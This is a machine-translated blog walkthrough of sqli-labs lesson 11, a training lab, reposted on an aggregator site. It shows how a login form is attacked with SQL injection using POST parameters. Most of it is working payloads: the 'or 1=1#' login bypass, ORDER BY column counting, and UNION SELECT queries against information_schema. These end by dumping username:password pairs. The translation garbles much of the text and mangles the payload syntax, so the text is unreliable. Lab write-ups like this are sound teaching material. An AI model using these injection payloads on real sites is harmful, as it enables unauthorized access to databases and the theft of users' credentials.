sqli-labs Less-11

Others 2020-03-28 12:39:26 views: null

11 POST-Less - Based Error - Single QUOTES - String
. 0x01 original page
Here Insert Picture Description
Here Insert Picture Description
check elements can see the user name and password are two parameters uname and passwd

Enter the correct user name and password
Here Insert Picture Description

Have the correct echo

Input user name and password incorrect
Here Insert Picture Description
0x02. Analyzing injection type
the uname the passwd = =. 1. 1
Here Insert Picture Description
the uname =. 1 ". 1 = the passwd
Here Insert Picture Description
the uname =. 1 '. 1 the passwd =
Here Insert Picture Description

You
 have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near '1' LIMIT 
0,1' at line 1

Analyzing single quotes may be closed by a given sentence

Analyzing 0x03 injection point
universal password: uname = 1 'or 1 = 1 #
Here Insert Picture Description

Have the correct data

uname = admin 'and' 1 ' =' 2
Here Insert Picture Description
page no data, thereby determining the presence of at uname sql injection vulnerability

0x04. Determines the number of fields
the uname = ADMIN '. 3 by Order #
(# sql statement content for later commented)
Here Insert Picture Description

Error, indicating the number of fields is not 3, continue to test

ADMIN = the uname 'by Order # 2
(# comment out the content for later sql statement)
Here Insert Picture Description

With the correct data show, indicating that the query returns the number of fields is 2, but does not represent the number of fields in the table 2.

0x05. Query version
uname = -1 'union select 1, version () #
Here Insert Picture Description

0x06. Querying the database
uname = -1 'union select 1, (select group_concat (schema_name) from information_schema.schemata) #

Here Insert Picture Description

Your Password:information_schema,challenges,cms,dvwa,espcms_v5,mysql,performance_schema,pikachu,security,sqltest,test

0x07. Queries the database table
uname = -1 'union select 1, (select group_concat (table_name) from information_schema.tables where table_schema = "security") #

Here Insert Picture Description

Your Password:emails,referers,uagents,users

0x08. Lookup table fields

uname=-1’ union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’#

Here Insert Picture Description

Your Password:id,username,password

0x09. Obtain the value
uname = -1 'union select 1, (select group_concat (username, 0x3a, password) from users) #

Here Insert Picture Description

Your
 
Password:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4,admin'--
 -:123456
all over
Published 15 original articles · won praise 2 · Views 293
Private letter concerns

Guess you like

Origin blog.csdn.net/qq_42630215/article/details/105115842
Recommended
Arc Browser for Windows 1.0 officially GA
A programmer born in the 1990s developed a video porting software and made over 7 million in less than a year. The ending was very punishing!
Ranking
1. Select Sort
Create a thread thread
3 press to play ball that reach 6
Programmation CUDA (4) : gestion de la mémoire
SpringBoot database connection pool Druid error
E Diudiu App redesign summary
4EVERLAND Hosting now supports SNS+IPFS
About HTTPS
[vue3+vite+ts+element-plu+sass] uses bug records in sass
Interpretation of HUAWEI CLOUD GaussDB (for Influx): Best Practice Data Modeling
Daily
More
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)

Code World

© 2018 codetd.com